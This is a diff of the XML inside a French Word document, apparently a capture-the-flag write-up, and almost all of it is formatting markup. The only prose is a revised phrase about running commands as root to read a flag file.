-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>root</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> et pouvoir lire le fichier flag.txt</w:t>
+        <w:t xml:space="preserve"> pour lancer des commandes en root et pouvoir lire le fichier flag.txt</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17627,7 +17839,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId36"/>
+                    <a:blip r:embed="rId39"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -17796,7 +18008,7 @@
     </w:p>
     <w:p/>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId37"/>
+      <w:footerReference w:type="default" r:id="rId40"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
       <w:pgNumType w:start="0"/>
@@ -17809,7 +18021,7 @@
 </file>
 
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
   <w:endnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
@@ -17834,7 +18046,7 @@
 </file>
 
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
   <w:sdt>
     <w:sdtPr>
       <w:id w:val="-1868281261"/>
@@ -17879,7 +18091,7 @@
 </file>
 
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
   <w:footnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
@@ -17904,8 +18116,8 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
-  <w:abstractNum w:abstractNumId="0">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="019B4946"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CC021846"/>
@@ -17994,7 +18206,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1">
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1A5574A1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F20694C6"/>
@@ -18107,7 +18319,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="20C73CFC"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E9CCE868"/>
@@ -18220,7 +18432,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="29513814"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="FD648CE4"/>
@@ -18333,7 +18545,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2BF334CD"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A7840E56"/>
@@ -18446,7 +18658,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2D664E8E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="734C98C6"/>
@@ -18559,7 +18771,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="34FD120E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2D4C1A4C"/>
@@ -18672,7 +18884,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="35EC4D13"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4F3AED2C"/>
@@ -18785,7 +18997,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="383E5E6F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CCE873C8"/>
@@ -18874,7 +19086,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3FA858A4"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="D898B890"/>
@@ -18963,7 +19175,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4CFE63CA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="1A9C37AA"/>
@@ -19076,7 +19288,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4F582193"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8ABE1F90"/>
@@ -19189,7 +19401,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="58143936"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="918C1E70"/>
@@ -19278,7 +19490,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="58394DAD"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6E0ADD14"/>
@@ -19391,7 +19603,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="64902A80"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="06A8AB92"/>
@@ -19480,7 +19692,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="64E97AAB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="78245ECE"/>
@@ -19569,7 +19781,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6810007B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="252437A4"/>
@@ -19658,7 +19870,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6BB8375B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9704F4AC"/>
@@ -19771,7 +19983,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="71744325"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="24A67088"/>
@@ -19884,7 +20096,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7CC3298B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3236CB62"/>
@@ -19973,7 +20185,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7D8408FB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8CC014EA"/>
@@ -20129,7 +20341,7 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -20145,144 +20357,382 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
-    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
-    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
-    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
-    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
